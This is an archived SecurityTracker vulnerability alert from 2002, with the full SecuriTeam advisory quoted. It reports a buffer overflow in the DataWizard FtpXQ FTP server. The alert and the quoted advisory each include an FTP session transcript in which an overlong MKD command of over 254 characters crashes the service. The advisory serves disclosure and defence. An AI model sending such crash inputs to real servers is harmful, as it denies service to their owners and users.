SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (File Transfer/Sharing)  >   FtpXQ Vendors:   DataWizard Technologies
DataWizard FtpQX Server Buffer Overflow Lets Remote Authenticated Users Crash the Service
SecurityTracker Alert ID:  1004392
SecurityTracker URL:  http://securitytracker.com/id/1004392
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 28 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2.0.98 and more recent versions
Description:   A buffer overflow vulnerability was reported in the DataWizard FtpXQ file transfer protocol server. A remote authenticated user can cause the FTP service to crash.

SecuriTeam reported that a remote authenticated user can send a long "make directory" request to trigger the buffer overflow and cause the FTP server to crash.

A demonstration exploit transcript is provided:

% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.98).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> MKD AAAAAAAAAAAAA.....AAAA

(longer than 254 chars crashes the server)

SecuriTeam credits SnakeByte / Eric Sesterhenn with reporting this bug.

Impact:   A remote user can cause the FTP server to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.datawizard.net/Support/FtpXQ/ftpxq.htm (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Date:  Tue, 28 May 2002 02:02:16 -0400
Subject:  [NT] FtpXQ MKD Buffer Overflow


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -



  FtpXQ MKD Buffer Overflow
------------------------------------------------------------------------


SUMMARY

 <http://www.datawizard.net/Support/FtpXQ/ftpxq.htm> FtpXQ is an FTP 
Server built using the WinsockQ from DataWizard Technologies. A security 
vulnerability in the product allows remote attackers to overflow an 
internal buffer by providing an overly long "make directory" request.

DETAILS

Vulnerable systems:
 * FtpXQ Server version 2.0.98 and above

Example:
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.98).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> MKD AAAAAAAAAAAAA.....AAAA

(longer than 254 chars crashes the server)


ADDITIONAL INFORMATION

The information has been provided by  <mailto:snakebyte@gmx.de> SnakeByte 
/ Eric Sesterhenn.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages. 






 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC